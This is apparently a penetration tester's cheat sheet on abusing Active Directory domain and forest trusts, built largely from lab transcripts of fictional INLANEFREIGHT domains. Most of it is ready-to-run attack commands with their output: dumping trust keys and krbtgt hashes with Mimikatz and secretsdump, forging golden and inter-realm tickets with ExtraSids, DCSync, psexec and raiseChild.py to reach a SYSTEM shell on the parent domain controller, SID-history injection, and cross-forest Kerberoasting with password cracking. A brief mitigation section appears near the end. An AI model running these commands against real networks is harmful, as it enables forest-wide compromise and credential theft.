Trusts

One-way trust - Unidirectional: Users in the trusted domain can access resources in the trusting domain but the reverse is not true

Two-way trust - Bi-directional: Users of both domains can access resources in the other domain

Transitive: can be extended to establish trust relationships with other domains Nontransitive: can not be extended to other domains in the forest

Parent-child trust: yolo.domain.local is a child of domain.local. The trust is always two-way transitive

Tree-root trust: The trust is always two-way transitive

External trusts: Beetween two domains in differents forests when forests do not have a trust relationship. Non transitive

Enumerating Trust Relationships

Enumeration from Windows Host

PS C:\htb> Import-Module activedirectory
PS C:\htb> Get-ADTrust -Filter *

Direction               : BiDirectional
DisallowTransivity      : False
DistinguishedName       : CN=LOGISTICS.INLANEFREIGHT.LOCAL,CN=System,DC=INLANEFREIGHT,DC=LOCAL
ForestTransitive        : False
IntraForest             : True
IsTreeParent            : False
IsTreeRoot              : False
Name                    : LOGISTICS.INLANEFREIGHT.LOCAL
ObjectClass             : trustedDomain
ObjectGUID              : f48a1169-2e58-42c1-ba32-a6ccb10057ec
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=INLANEFREIGHT,DC=LOCAL
Target                  : LOGISTICS.INLANEFREIGHT.LOCAL
TGTDelegation           : False
TrustAttributes         : 32
TrustedPolicy           :
TrustingPolicy          :
TrustType               : Uplevel
UplevelOnly             : False
UsesAESKeys             : False
UsesRC4Encryption       : False

PowerView

PS C:\htb> Get-DomainTrust 

SourceName      : INLANEFREIGHT.LOCAL
TargetName      : LOGISTICS.INLANEFREIGHT.LOCAL
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 11/1/2021 6:20:22 PM
WhenChanged     : 2/26/2022 11:55:55 PM

SourceName      : INLANEFREIGHT.LOCAL
TargetName      : FREIGHTLOGISTICS.LOCAL
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection  : Bidirectional
WhenCreated     : 11/1/2021 8:07:09 PM
WhenChanged     : 2/27/2022 12:02:39 AM

PS C:\htb> Get-DomainTrustMapping

SourceName      : INLANEFREIGHT.LOCAL
TargetName      : LOGISTICS.INLANEFREIGHT.LOCAL
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 11/1/2021 6:20:22 PM
WhenChanged     : 2/26/2022 11:55:55 PM

SourceName      : INLANEFREIGHT.LOCAL
TargetName      : FREIGHTLOGISTICS.LOCAL
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection  : Bidirectional
WhenCreated     : 11/1/2021 8:07:09 PM
WhenChanged     : 2/27/2022 12:02:39 AM

SourceName      : FREIGHTLOGISTICS.LOCAL
TargetName      : INLANEFREIGHT.LOCAL
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection  : Bidirectional
WhenCreated     : 11/1/2021 8:07:08 PM
WhenChanged     : 2/27/2022 12:02:41 AM

SourceName      : LOGISTICS.INLANEFREIGHT.LOCAL
TargetName      : INLANEFREIGHT.LOCAL
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 11/1/2021 6:20:22 PM
WhenChanged     : 2/26/2022 11:55:55 PM

Checking Users in the Child Domain using Get-DomainUser

PS C:\htb> Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName

samaccountname
--------------
htb-student_adm
Administrator
Guest
lab_adm
krbtgt

Netdom

C:\htb> netdom query /domain:inlanefreight.local trust
Direction Trusted\Trusting domain                         Trust type
========= =======================                         ==========

<->       LOGISTICS.INLANEFREIGHT.LOCAL
Direct
 Not found

<->       FREIGHTLOGISTICS.LOCAL
Direct
 Not found

The command completed successfully.

C:\htb> netdom query /domain:inlanefreight.local dc
List of domain controllers with accounts in the domain:

ACADEMY-EA-DC01
The command completed successfully.

C:\htb> netdom query /domain:inlanefreight.local workstation
List of workstations with accounts in the domain:

ACADEMY-EA-MS01
ACADEMY-EA-MX01      ( Workstation or Server )

SQL01      ( Workstation or Server )
ILF-XRG      ( Workstation or Server )
MAINLON      ( Workstation or Server )
CISERVER      ( Workstation or Server )
INDEX-DEV-LON      ( Workstation or Server )
...SNIP...

TrustValidator

Validate potential security issues in Active Directory trust relationships

GitHub - nullenc0de/trust-validator: Validates priv escalation of AD trustsGitHub

Child -> Parent Trust

Windows - Using Trust Tickets

It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory TrustsActive Directory Security

child.parent.local : child = current domain

parent.local: parent

• Look for [In] trust key from child to parent

# Option 1
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName child-dc

# Option 2
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' 

# Option 3
Invoke-Mimikatz -Command '"lsadump::dcsync /user:child\parent$"'

• Forge an inter-realm TGT

# enterprise_admins_group_sid_parent_domain
Get-DomainGroup -Identity "Enterprise Admins" -Domain parent.local | Select-Object SamAccountName, SID

# child_domain_sid = current domain
(Get-Domain).ObjectSID

BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_domain_sid> /sids:<enterprise_admins_group_sid_parent_domain> /rc4:<In_trust_key> /service:krbtgt /target:parent.local /ticket:C:\path\to\trust_tkt.kirbi" "exit"

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_domain_sid> /sids:<enterprise_admins_group_sid_parent_domain> /rc4:<In_trust_key> /service:krbtgt /target:parent.local /ticket:C:\path\to\trust_tkt.kirbi"'

• Option 1: Abuse with Kekeo

GitHub - NotScortator/asktgs_compiled: KEKEO_OLD executablesGitHub

1. Get a TGS for a service in the target domain

asktgs_compiled/asktgs.exe at master · NotScortator/asktgs_compiledGitHub

# Old version of kekeo
.\asktgs.exe C:\path\to\trust_tkt.kirbi CIFS/dc.parent.local

Releases · gentilkiwi/kekeoGitHub

# New Version
tgs::ask /tgt:C:\path\to\trust_tkt.kirbi /service:CIFS/dc.parent.local

Ticket for other service (HOST and RPCSS for WMI, HTTP for Powershell Remoting and WinRM) can also be created

1. Use the TGS to access the targeted service

asktgs_compiled/kirbikator.exe at master · NotScortator/asktgs_compiledGitHub

# Old version of kekeo
.\kirbikator.exe lsa .\CIFS.dc.parent.local.kirbi

# New version of kekeo
misc::convert lsa TGS_Administrator@child.parent.local_krbtgt~PARENT.LOCAL@CHILD.PARENT.LOCAL.kirbi

ls \\dc.parent.local\c$

• Option 2: Abuse with Rubeus

Rubeus.exe asktgs /ticket:C:\path\to\trust_tkt.kirbi /service:cifs/dc.parent.local /dc:dc.parent.local /ptt

ls \\dc.parent.local\c$

or forge ticket

Rubeus.exe silver /service:krbtgt/CHILD.PARENT.LOCAL /rc4:<In_trust_key> /sid:<current_domain_sid> /sids:<enterprise_admins_group_sid_parent_domain> /ldap /user:Administrator /nowrap

use forged ticket

Rubeus.exe asktgs /service:http/dc.PARENT.LOCAL /dc:dc.PARENT.LOCAL /ptt /ticket:<FORGED TICKET>

Windows - Using krbtgth hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_sid> /sids:<enterprise_admin_sid> /krbtgt:<krbtgt_ntlm_hash> /ptt" "exit"

# Or 

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_sid> /sids:<enterprise_admin_sid> /krbtgt:<krbtgt_ntlm_hash> /ptt"'

Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\krbtgt.kirbi"'

ls \\dc.parent.local\c$

gwmi -class win32_operatingsystem -ComputerName dc.parent.local

Enter-PSSession dc.parent.local

SafetyKatz.exe "lsadump::dcsync /user:parent\krbtgt /domain:parent.local" "exit"

• Avoid suspicious logs by using DC group

Certificates and Pwnage and Patches, Oh My!Posts By SpecterOps Team Members

BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_sid> /groups:516 /sids:<DC_sid>,s-1-5-9 /krbtgt:<krbtgt_ntlm_hash> /ptt" "exit"

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:child.parent.local /sid:<child_sid> /groups:516 /sids:<DC_sid>,s-1-5-9 /krbtgt:<krbtgt_ntlm_hash> /ptt"'

Or:

BetterSafetyKatz.exe "kerberos::golden /aes256:<krbtgt_aes> /user:child-dc$ /id:1000 /domain:child.parent.local /sid:<child_sid> /sids:<DC_SID>,S-1-5-9 /krbtgt:<krbtgt_ntlm_hash> /ptt" "exit"

Invoke-Mimikatz -Command '"kerberos::golden /aes256:<krbtgt_aes> /user:child-dc$ /id:1000 /domain:child.parent.local /sid:<child_sid> /sids:<DC_SID>,S-1-5-9 /krbtgt:<krbtgt_ntlm_hash> /ptt"'

SafetyKatz.exe "lsadump::dcsync /user:parent\krbtgt /domain:parent.local" "exit"


Invoke-Mimikatz -Command '"lsadump::dcsync /user:parent\krbtgt /domain:parent.local"'

Or diamond

Rubeus.exe diamond /krbkey:<krbtgt_aes> /tgtdeleg /enctype:aes /ticketuser:child-dc$ /domain:child.parent.local /dc:dc.child.parent.local /ticketuserid:1000 /sids:<DC_SID>,S-1-5-9 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

SafetyKatz.exe "lsadump::dcsync /user:parent\krbtgt /domain:parent.local" "exit"

Windows - ExtraSids Attack

With Mimikatz

Obtaining KRBTGT NT hash

PS C:\htb>  mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
[DC] 'LOGISTICS.INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC02.LOGISTICS.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'LOGISTICS\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 11/1/2021 11:21:33 AM
Object Security ID   : S-1-5-21-2806153819-209893948-922872689-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 9d765b482771505cbe97411065964d5f
    ntlm- 0: 9d765b482771505cbe97411065964d5f
    lm  - 0: 69df324191d4a80f0ed100c10f20561e

SID for the child domain - PowerView

PS C:\htb> Get-DomainSID

S-1-5-21-2806153819-209893948-922872689

Enterprise Admins Group SID - PowerView

PS C:\htb> Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

distinguishedname                                       objectsid                                    
-----------------                                       ---------                                    
CN=Enterprise Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL S-1-5-21-3842939050-3880317879-2865463114-519

At this point, we have gathered the following data points:

• The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f

• The SID for the child domain: S-1-5-21-2806153819-209893948-922872689

• The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: hacker

• The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL

• The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050-3880317879-2865463114-519

Golden Ticket to access all resources within the parent domain

PS C:\htb> mimikatz.exe

mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
User      : hacker
Domain    : LOGISTICS.INLANEFREIGHT.LOCAL (LOGISTICS)
SID       : S-1-5-21-2806153819-209893948-922872689
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3842939050-3880317879-2865463114-519 ;
ServiceKey: 9d765b482771505cbe97411065964d5f - rc4_hmac_nt
Lifetime  : 3/28/2022 7:59:50 PM ; 3/25/2032 7:59:50 PM ; 3/25/2032 7:59:50 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'hacker @ LOGISTICS.INLANEFREIGHT.LOCAL' successfully submitted for current session

PS C:\htb> klist

Current LogonId is 0:0xf6462

Cached Tickets: (1)

#0>     Client: hacker @ LOGISTICS.INLANEFREIGHT.LOCAL
        Server: krbtgt/LOGISTICS.INLANEFREIGHT.LOCAL @ LOGISTICS.INLANEFREIGHT.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/28/2022 19:59:50 (local)
        End Time:   3/25/2032 19:59:50 (local)
        Renew Time: 3/25/2032 19:59:50 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

PS C:\htb> ls \\academy-ea-dc01.inlanefreight.local\c$
 Volume in drive \\academy-ea-dc01.inlanefreight.local\c$ has no label.
 Volume Serial Number is B8B3-0D72

 Directory of \\academy-ea-dc01.inlanefreight.local\c$

09/15/2018  12:19 AM    <DIR>          PerfLogs
10/06/2021  01:50 PM    <DIR>          Program Files
09/15/2018  02:06 AM    <DIR>          Program Files (x86)
11/19/2021  12:17 PM    <DIR>          Shares
10/06/2021  10:31 AM    <DIR>          Users
03/21/2022  12:18 PM    <DIR>          Windows
               0 File(s)              0 bytes

- With Rubeus

/rc4 flag is the NT hash for the KRBTGT account

PS C:\htb>  .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2 

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : LOGISTICS.INLANEFREIGHT.LOCAL (LOGISTICS)
[*] SID            : S-1-5-21-2806153819-209893948-922872689
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ExtraSIDs      : S-1-5-21-3842939050-3880317879-2865463114-519
[*] ServiceKey     : 9D765B482771505CBE97411065964D5F
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 9D765B482771505CBE97411065964D5F
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : krbtgt
[*] Target         : LOGISTICS.INLANEFREIGHT.LOCAL

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'hacker@LOGISTICS.INLANEFREIGHT.LOCAL'

[*] AuthTime       : 3/29/2022 10:06:41 AM
[*] StartTime      : 3/29/2022 10:06:41 AM
[*] EndTime        : 3/29/2022 8:06:41 PM
[*] RenewTill      : 4/5/2022 10:06:41 AM

[*] base64(ticket.kirbi):
      doIF0zCCBc+gAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoR8bHUxPR0lTVElDUy5JTkxBTkVG
      <SNIP >
      Q0FMqTIwMKADAgECoSkwJxsGa3JidGd0Gx1MT0dJU1RJQ1MuSU5MQU5FRlJFSUdIVC5MT0NBTA==

[+] Ticket successfully imported!

When dealing with multiple domains and our target domain is not the same as the user's domain, we will need to specify the exact domain to perform the DCSync operation on the particular domain controller.

mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL

[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\lab_adm' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : lab_adm

** SAM ACCOUNT **

SAM Username         : lab_adm
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 2/27/2022 10:53:21 PM
Object Security ID   : S-1-5-21-3842939050-3880317879-2865463114-1001
Object Relative ID   : 1001

Credentials:
  Hash NTLM: 663715a1a8b957e8e9943cc98ea451b6
    ntlm- 0: 663715a1a8b957e8e9943cc98ea451b6
    ntlm- 1: 663715a1a8b957e8e9943cc98ea451b6
    lm  - 0: 6053227db44e996fe16b107d9d1e95a0

Linux - Step by step

KRBTGT Hash

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e
krbtgt:des-cbc-md5:fee04c3d026d7538
[*] Cleaning up...

SID child domain

$ lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 

Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 172.16.5.240
[*] StringBinding ncacn_np:172.16.5.240[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
500: LOGISTICS\Administrator (SidTypeUser)
501: LOGISTICS\Guest (SidTypeUser)
502: LOGISTICS\krbtgt (SidTypeUser)
512: LOGISTICS\Domain Admins (SidTypeGroup)
513: LOGISTICS\Domain Users (SidTypeGroup)
<SNIP>

$ lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"

Password:

[*] Domain SID is: S-1-5-21-2806153819-209893948-92287268

Enterprise Admin Group SID

$ lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

Password:
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114
498: INLANEFREIGHT\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: INLANEFREIGHT\administrator (SidTypeUser)
501: INLANEFREIGHT\guest (SidTypeUser)
502: INLANEFREIGHT\krbtgt (SidTypeUser)
512: INLANEFREIGHT\Domain Admins (SidTypeGroup)
513: INLANEFREIGHT\Domain Users (SidTypeGroup)
514: INLANEFREIGHT\Domain Guests (SidTypeGroup)
515: INLANEFREIGHT\Domain Computers (SidTypeGroup)
516: INLANEFREIGHT\Domain Controllers (SidTypeGroup)
517: INLANEFREIGHT\Cert Publishers (SidTypeAlias)
518: INLANEFREIGHT\Schema Admins (SidTypeGroup)
519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)

-> S-1-5-21-3842939050-3880317879-2865463114-519

Golden Ticket

$ ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for LOGISTICS.INLANEFREIGHT.LOCAL/hacker
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in hacker.ccache

$ export KRB5CCNAME=hacker.ccache 

$ psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 172.16.5.5.....
[*] Found writable share ADMIN$
[*] Uploading file nkYjGWDZ.exe
[*] Opening SVCManager on 172.16.5.5.....
[*] Creating service eTCU on 172.16.5.5.....
[*] Starting service eTCU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
ACADEMY-EA-DC01

secretsdump LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

Linux - RaiseChild.py - All in one

$ raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

Password:
[*] Raising child domain LOGISTICS.INLANEFREIGHT.LOCAL
[*] Forest FQDN is: INLANEFREIGHT.LOCAL
[*] Raising LOGISTICS.INLANEFREIGHT.LOCAL to INLANEFREIGHT.LOCAL
[*] INLANEFREIGHT.LOCAL Enterprise Admin SID is: S-1-5-21-3842939050-3880317879-2865463114-519
[*] Getting credentials for LOGISTICS.INLANEFREIGHT.LOCAL
LOGISTICS.INLANEFREIGHT.LOCAL/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
LOGISTICS.INLANEFREIGHT.LOCAL/krbtgt:aes256-cts-hmac-sha1-96s:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
[*] Getting credentials for INLANEFREIGHT.LOCAL
INLANEFREIGHT.LOCAL/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:16e26ba33e455a8c338142af8d89ffbc:::
INLANEFREIGHT.LOCAL/krbtgt:aes256-cts-hmac-sha1-96s:69e57bd7e7421c3cfdab757af255d6af07d41b80913281e0c528d31e58e31e6d
[*] Target User account name is administrator
INLANEFREIGHT.LOCAL/administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
INLANEFREIGHT.LOCAL/administrator:aes256-cts-hmac-sha1-96s:de0aa78a8b9d622d3495315709ac3cb826d97a318ff4fe597da72905015e27b6
[*] Opening PSEXEC shell at ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file BnEGssCE.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service UVNb on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service UVNb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Stopping service UVNb.....
[*] Removing service UVNb.....
[*] Removing file BnEGssCE.exe.....

if

[-] [Errno Connection error (LOGISTICS.INLANEFREIGHT.LOCAL:445)] [Errno -3] Temporary failure in name resolution

add IP in /etc/hosts

-debug to get more info

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm -debug

AD CS Abuse

GitHub - MWR-CyberSec/AD-CS-Forest-Exploiter: Exploit AD CS misconfiguration allowing privilege escalation and persistence from any child domain to full forest compromiseGitHub

Domain Trust Abuse - AD CS

AD CS

Cross-Forest Trust Abuse

Only RID > 1000 SIDs will be allowed across the trust boundary - See SID history enabled

Windows - Using Trust Tickets

It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory TrustsActive Directory Security

• Trust key for the inter-forest trust

# Option 1
Invoke-Mimikatz -Command '"lsadump::trust /patch"'

# Option 2
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

• Forge inter-forest TGT

# Child_forest1 to forest2
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:child.parent_forest1.local /sid:<child_domain_sid> /rc4:<trust_key> /service:krbtgt /target:parent_forest2.local /ticket:C:\path\to\trust_forest_tkt.kirbi" "exit"

# or forest1 to forest1
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:forest1.local /sid:<domain_forest1_sid> /rc4:<trust_key> /service:krbtgt /target:forest2.local /ticket:C:\path\to\sharedwithforest1.kirbi"'

• Option 1: Abuse witk Kekeo

GitHub - NotScortator/asktgs_compiled: KEKEO_OLD executablesGitHub

Get a TGS for a service in the target domain forest

asktgs_compiled/asktgs.exe at master · NotScortator/asktgs_compiledGitHub

.\asktgs.exe C:\path\to\trust_forest_tkt.kirbi CIFS/dc.parent_forest2.local

Use the TGS to access the targetedd service

asktgs_compiled/kirbikator.exe at master · NotScortator/asktgs_compiledGitHub

.\kirbikator.exe lsa .\CIFS.dc.parent_forest2.local.kirbi

ls \\dc.parent_forest2.local\SharedwithForest1\

Ticket for other service (HOST and RPCSS for WMI, HTTP for Powershell Remoting and WinRM) can also be created

• Option 2: Abuse with Rubeus

Rubeus.exe asktgs /ticket:C:\path\to\trust_forest_tkt.kirbi /service:cifs/dc.parent_forest2.local /dc:dc.parent_forest2.local /ptt

ls \\dc.parent_forest2.local\SharedwithForest1\

or

Rubeus.exe silver /service:krbtgt/CHILD.PARENT.LOCAL /rc4:<trust_key> /sid:<child_domain_sid> /sids:<enterprise_admin_sid> /ldap /user:Administrator /nowrap

Rubeus.exe asktgs /service:http/dc.PARENT.LOCAL /dc:dc.PARENT.LOCAL /ptt /ticket<FORGED TICKET>

SID history enabled - /enablesidhistory:yes

Enumerate trust

Get-ADTrust -Filter *

SIDFilteringForestAware is set to True, it means SIDHistory is enabled across the forest trust.

Only RID > 1000 SIDs will be allowed across the trust boundary.

Get-ADGroup -Identity Forest1Admins -Server targetforest.local

Inject a SIDHistory for RID > 1000 to access resources accessible to that identity or group in the target trusting forest

[MS-PAC]: SID Filtering and Claims TransformationMicrosoftLearn

SID: S-1-5-21-domain-RID

From Forest1 DC, create a TGT with SIDHistory of Forest1Admins group

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:forest1.local /sid:<forest1_sid> /rc4:<trust_key> /service:krbtgt /target:forest2.local /sids:<enterprise_admin_sid_with_RID_sup_to_1000> /ticket:C:\path\to\ticket.kirbi"'

Request a TGS:

.\asktgs.exe C:\path\to\ticket.kirbi HTTP/web.forest2.local

Inject that into current session:

.\kirbikator.exe lsa HTTP.web.forest2.local.kirbi

Or

Rubeus.exe asktgs /ticket:C:\path\to\ticket.kirbi /service:HTTP/web.forest2.local /dc:dc.forest2.local /ptt

Access the web machine using PSRemoting:

Invoke-Command -ScriptBlock{whoami} -ComputerName web.forest2.local -Authentication NegotiateWithImplicitCredential

Mitigation

The following security controls should be implemented to mitigate a SID History compromise:

• Ensure the ‘sIDHistory’ attribute is not used. Unless migrating user objects from one domain to another, the ‘sIDHistory’ attribute should not be required. If no user objects are configured with this attribute, then a SID History compromise is not possible.

• Ensure the ‘sIDHistory’ attribute is checked weekly. Malicious actors may add a value to the ‘sIDHistory’ attribute of a user object they control to establish persistence. Regularly checking for this attribute on Active Directory objects may increase detection of this persistence strategy.

• Enable SID Filtering for domain and forest trusts. This prevents SIDs of built-in security groups, such as Domain Admins and Enterprise Admins, being used in TGTs across domains. However, malicious actors can still use the SIDs of other security groups if the Relative Identifier is greater than 1000.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

Windows - Cross Forest Kerberoasting

• CRTE

From forest1 to forest2

Enumerate named service accounts across forest trusts

# PowerView
Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName}

# AD Module
Get-ADTrust -Filter 'IntraForest -ne $true' | %{Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName -Server $_.Name}

Request a TGS

Rubeus.exe kerberoast /user:storagesvc /simple /domain:forest2.local /outfile:euhashes.txt

# With Powershell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList MSSQLSvc/file.forest2.local@forest2.local

Crack

john.exe--wordlist=C:\path\to\10k-worst-pass.txt C:\path\to\hashes.txt

Hashes

• CPTS

From inlanefreight.local - Powerview

PS C:\htb> Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

samaccountname
--------------
krbtgt
mssqlsvc

PS C:\htb> Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof

samaccountname memberof
-------------- --------
mssqlsvc       CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL

PS C:\htb> .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
